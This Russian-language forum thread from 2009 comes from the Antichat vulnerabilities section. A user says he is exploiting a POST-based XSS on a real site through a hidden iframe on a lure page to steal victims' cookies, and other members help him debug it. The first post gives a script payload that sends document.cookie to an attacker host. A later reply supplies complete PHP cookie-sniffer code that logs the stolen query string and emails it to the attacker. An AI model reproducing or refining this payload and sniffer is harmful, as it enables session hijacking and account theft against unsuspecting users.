ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS методом POST, неувязка
  #1  
Старый 17.11.2009, 16:04
Аватар для G4bR1eL
G4bR1eL
Познающий
Регистрация: 25.03.2008
Сообщений: 65
Провел на форуме:
190034

Репутация: 3
По умолчанию XSS методом POST, неувязка

Приветствую всех пользователй форума Antichat. Тему создал из-за проблемы, возможно если она решится это поможет многим другим людям которые пытались использовать уязвимость этим методом, но у них были какие-либо проблемы.

Недавно я нашел xss уязвимость на неком сайте site.com. Осуществить эту уязвимость можно было методом POST, так как работало целевое поле
<form method="POST">
Тут код
</form>. Тобишь проводился инклуд кода, который нефильтровался и уязвимость на ура помогала вытаскивать кукисы (ну и до сих пор помогает разумеется). Мною был создан сайт на бесплатном хостинге, где была размещена страница-удочка, с framom, который незаметно для жертвы открывает нашу страницу site.com/index.php, вводит скрипт в нашу форму "POST" и подтверждает её. Значит клиентская часть выполняется успешно. В результате невидимо от пользователя frame выводит его (без его ведома) на http://evilhost.ru/s.php?login=Lolo
В фрейме выполняется код по нашей форме "POST" и его перекидывает по нашей ссылке собственно
'">
<script>document.location.href="http://evilhost/s.php?"+document.cookie;</script>'>

+document.cookie в данном случае = $QUERY_STRING

Кого заинтерисует данная тема и кто работал с xss методом post, я бы хотел что бы этот человек посмотрел мой сниффер и frame и сказал в чем ошибка, буду очень благодарен, возможно даже денег дам.

P.s. Использовал сниффер от куника + свой, просто не хочет видеть QUERY. Тобишь на мыло мне приходит подтверждение что XSS сработала, но без данных. А в логи сниффера также записываются IP и данные браузера, но опять же без QUERY.

Последний раз редактировалось G4bR1eL; 20.11.2009 в 20:42..
 
Ответить с цитированием

  #2  
Старый 17.11.2009, 16:15
Аватар для Nightmarе
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Ошибка: $QUERY_STRING;
А надо:
$_SERVER['QUERY_STRING'];

У меня тоже вопрос по XSS через POST, они в Файрфоксе только у меня одного не выполняются, или всё работает нормально?
 
Ответить с цитированием

  #3  
Старый 17.11.2009, 17:49
Аватар для G4bR1eL
G4bR1eL
Познающий
Регистрация: 25.03.2008
Сообщений: 65
Провел на форуме:
190034

Репутация: 3
По умолчанию

Цитата:
Сообщение от Nightmarе  
Ошибка: $QUERY_STRING;
А надо:
$_SERVER['QUERY_STRING'];
Ошибку исправил Thx, но все равно резальтат такой.

=>

Цитата:
Сообщение от Nightmarе  
У меня тоже вопрос по XSS через POST, они в Файрфоксе только у меня одного не выполняются, или всё работает нормально?
Скорее всего у тебя какой то плагин который блокирует работу любого фрейма.
 
Ответить с цитированием

  #4  
Старый 17.11.2009, 17:56
Аватар для G4bR1eL
G4bR1eL
Познающий
Регистрация: 25.03.2008
Сообщений: 65
Провел на форуме:
190034

Репутация: 3
По умолчанию

P.p.s.

Вот йод фрейма который лежит на сайте-удочке. Друг говорит что неправильный синтаксис, но если бы это было так, код бы не выполнялся правильно ?

Последний раз редактировалось G4bR1eL; 20.11.2009 в 20:43..
 
Ответить с цитированием

  #5  
Старый 17.11.2009, 18:40
Аватар для Nightmarе
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Ну а ты скрипт то тестировал сам?
http://evilhost.com/s.php?ass
в этом случае в теле письма есть слово ass ?
Если есть, то кукисы значит не доходят до сниффа.

PS: у меня чистый FF3 никаких плагинов.
 
Ответить с цитированием

  #6  
Старый 17.11.2009, 18:53
Аватар для G4bR1eL
G4bR1eL
Познающий
Регистрация: 25.03.2008
Сообщений: 65
Провел на форуме:
190034

Репутация: 3
По умолчанию





Тобишь ошибка во frame ?
 
Ответить с цитированием

  #7  
Старый 17.11.2009, 16:21
Аватар для Sams
Sams
Участник форума
Регистрация: 18.04.2009
Сообщений: 120
Провел на форуме:
435863

Репутация: 80
По умолчанию

В FireFox стоит защита от пассивных XSS данного рода (через фрейм). Я вот точно не помню, это "вшитая" функция в браузер, либо она появляется при установки плагина NoScript.
 
Ответить с цитированием

  #8  
Старый 17.11.2009, 18:54
Аватар для xa-xa89
xa-xa89
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
Провел на форуме:
1054394

Репутация: 74
Отправить сообщение для xa-xa89 с помощью ICQ
По умолчанию

Покажи исправленый код снифера.
Тобишь ошибка в снифере.
 
Ответить с цитированием

  #9  
Старый 17.11.2009, 19:02
Аватар для xa-xa89
xa-xa89
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
Провел на форуме:
1054394

Репутация: 74
Отправить сообщение для xa-xa89 с помощью ICQ
По умолчанию

по идеи код должен быть такой
PHP код:
<?php
$file 
true;            //сохранять в файл
$filename "cookies.txt";    //имя файла
$mail true;            //отправлять на мыло
$mailaddr "pelodka@lol.ru";    //адрес мыла
if ($file)
$f fopen($filename'a');
  
flock($f,2);
  
fputs($f$_SERVER['QUERY_STRING']."\r\n\r\n\r\n");
  
fflush ($f);
  
flock($f,3);
  
fclose($f); }
if (
$mail)
mail ($mailaddr"Uzer waz XSSed! Eat his cookies! :)""$_SERVER['QUERY_STRING']"); }
?>
 
Ответить с цитированием

  #10  
Старый 17.11.2009, 19:13
Аватар для G4bR1eL
G4bR1eL
Познающий
Регистрация: 25.03.2008
Сообщений: 65
Провел на форуме:
190034

Репутация: 3
По умолчанию

Теперь выбивает при site.h16.ru/s.php?ass и при работе
site.h16.ru/s.php?document_cookie; такой мессадж:

Parse error: parse error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/j/site.h16.ru/WWW/s.php on line 17

Последний раз редактировалось G4bR1eL; 20.11.2009 в 20:43..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Энциклопедия уязвимых скриптов DIAgen Сценарии/CMF/СMS 401 17.06.2010 17:39
Пассивиная Xss для браузера IE методом обхода граффического фильтра __XT__ Уязвимости 13 27.11.2006 03:04
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Xss Расширенный межсайтовый скриптинг SNIFF Чужие Статьи 0 24.11.2005 08:08
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ